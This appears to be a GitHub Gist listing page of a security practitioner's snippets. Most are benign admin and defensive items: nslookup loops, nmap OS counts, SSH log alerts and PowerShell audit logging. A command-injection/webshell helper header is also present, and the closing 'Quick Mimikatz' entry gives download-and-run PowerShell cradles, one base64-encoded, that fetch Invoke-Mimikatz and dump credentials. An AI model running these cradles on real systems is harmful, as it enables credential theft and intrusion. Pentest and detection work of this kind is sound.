Skip to content

Instantly share code, notes, and snippets.

@gfoss
gfoss / nslookup loops
Last active April 20, 2022 16:45
Basic nslookup loops for Windows and Linux
*****WINDOWS*****
//nslookup - subnet range
c:\>for /L %i in (1,1,255) do @nslookup 10.10.10.%i [server to resolve from] 2>nul | find "Name" && echo 10.10.10.%i && @echo [ctrl+g]
//nslookup - file of ip's
NAME c:\>for /F %i in ([file.txt]) do @nslookup %i [server to resolve from] 2>nul | find "Name" && echo %i
ADDRESS c:\>for /F %i in ([file.txt]) do @nslookup %i [server to resolve from] 2>nul | find "Address" && echo %i
Or just run c:\>nslookup and paste in the list
@gfoss
gfoss / netcat heartbeat
Last active May 30, 2016 06:27
NetCat based heartbeat one-liner, great for pentesting to let you know if the service you are testing has crashed.
$ while `nc -nn -vv -z -w3 [ip-address] [port] > /dev/null`; do echo "OK"; sleep 1; done; echo "DOWN"; while (true); do echo "***DOWN***"; sleep 5; done
@gfoss
gfoss / ssh-alert-cronjob
Last active December 12, 2015 02:38
simple cronjob to alert on 'unknown/unexpected' access to a system.
0 */1 * * * last -5 | grep -v '[user]\|wtmp\|reboot\|shutdown' && last -10 | grep -v '[user]\|wtmp\|reboot\|shutdown' >> ~/Desktop/ALERT && wall -g [group] ~/Desktop/ALERT
@gfoss
gfoss / ssh-attempts.txt
Last active December 30, 2018 11:02
grep IP addresses from auth logs to see attempted ssh attempts into your box w/ invalid creds {ubuntu}
#search for invalid logon attempts, pull out IP, remove dupes, sort...
$ grep -rhi 'invalid' /var/log/auth.log* | awk '{print $10}' | uniq | sort > ~/ips.txt
#look em up
$ for i in `cat ~/ips.txt`; do @nslookup $i 2>/dev/null | grep Name | tail -n 1 | cut -d " " -f 3; done > ~/who.txt
# :-) #
$ do moar things...
@gfoss
gfoss / nmap-os-detection
Created August 28, 2013 19:52
OS-detection. Run this nmap command to count OS's and view the os.txt output file to see the results per-system.
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices"
@gfoss
gfoss / autopeep.sh
Last active July 20, 2016 05:41
Simple script used to set peepingtom.py to run automatically via bash script + cronjob, serve up the content and send out e-mail notifications.
#!/bin/bash
#
# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications.
# Optimized for Kali Linux
# greg.foss[at]owasp.org
#
# cronjob to run this script once a week every Sunday at Midnight
# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh
# prepare storage location, remove old data, and migrate existing folders
@gfoss
gfoss / command injector
Created September 10, 2014 07:01
script to assist in exploiting command injection vulns / interacting with simple webshells
#!/bin/bash
#
# Command Injector v0.1
# greg.foss[at]owasp.org
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html
function usage {
echo "usage: -u URL"
echo "eg : -u \"http://site.com/index.php?cmd=\""
### Keybase proof
I hereby claim:
* I am gfoss on github.
* I am heinzarelli (https://keybase.io/heinzarelli) on keybase.
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E
To claim this, I am signing this object:
@gfoss
gfoss / PowerShell Command Line Logging
Last active August 4, 2023 18:02
Detect and alert on nefarious PowerShell command line activity
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
@gfoss
gfoss / Quick-Mimikatz
Last active October 26, 2023 09:48
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl